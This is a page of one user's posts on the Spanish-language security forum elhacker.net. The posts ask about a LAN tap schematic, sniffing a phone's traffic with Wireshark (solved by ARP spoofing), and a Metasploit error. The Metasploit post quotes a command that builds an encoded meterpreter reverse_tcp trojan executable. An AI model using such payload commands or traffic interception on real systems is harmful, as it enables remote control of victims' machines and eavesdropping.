elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 [2]
11  Informática / Hardware / Re: Throwing star lan tap en: 9 Enero 2014, 15:22 pm
cerrad el tema. ya lo consegui
12  Informática / Hardware / Throwing star lan tap en: 7 Enero 2014, 20:07 pm
Alguien tiene el PCB o el esquemático del Throwing star lan tap?
Para el que no sabe que es:
13  Seguridad Informática / Hacking / Re: Wireshark - Celular en: 27 Febrero 2013, 06:10 am
soy un boludo, me habia olvidado de hacer el ARP spoofing
14  Seguridad Informática / Hacking / Wireshark - Celular en: 27 Febrero 2013, 00:52 am
Buenas. Hace poco adquiri un Galaxy SIII y estuve bajandome todo tipo de programas. Entre ellos el Whatsapp Sniffer (que ya no funciona, porque los mensajes son cifrados, en una de las versiones actualizadas de whatsapp), y entonces quise capturar los paquetes de datos que el celular manda.
Aclaro que yo de esto, mucho no se. pero igualmente quise intentar. puse el wireshark desde W7 y filtre los resultados ip.addr == 192.168.1.X donde esta la ip de mi celular en la red interna. pero extrañamente no captura NINGUN tipo de dato.  Ya sea Whatsapp, por navegador, o cualquiera sea la aplicacion.

Quisiera saber si alguno tiene idea de como capturar los datos del celular. porque al parecer estoy haciendo algo mal y lo que mi celular mande, no llega por ningun lado al wireshark.
Me parecio interesante! Saludos.
15  Seguridad Informática / Análisis y Diseño de Malware / Re: Error troyano metasploit en: 5 Diciembre 2012, 04:52 am
lo de la "e" fue un error de transcripcion, no es qe me la haya olvidado ^^

por ultimo GRACIAS!!! era ese simbolo agregado ">" de mas ! tema que puede ser cerrado!
16  Seguridad Informática / Análisis y Diseño de Malware / Error troyano metasploit en: 4 Diciembre 2012, 20:45 pm
Buenas, que tal. Tengo un problema al intentar crear un troyano con Metasploit en BackTrack 5 r2 dentro de Oracle VM VirtualBox en Ubuntu.
Esto es lo que estaría en la consola:

Citar
msf > msfpayload windows/metrpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4321 R | msfencode -t exe -e x86/shikata_ga_nai >> prueba.exe

también intenté cambiando el LHOST por mi IP dentro de la red local pero aún así no funciona.

el error:
Citar
[-] No encoders succeded

ni siquiera alguna otra pista, sólo eso. el archivo se crea igual pero al tratar de ejecutarlo en windows xp sp2+ (versión identificada por nmap), me tira el error  "prueba.exe no es una aplicacion Win32 valida."

alguna idea?
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines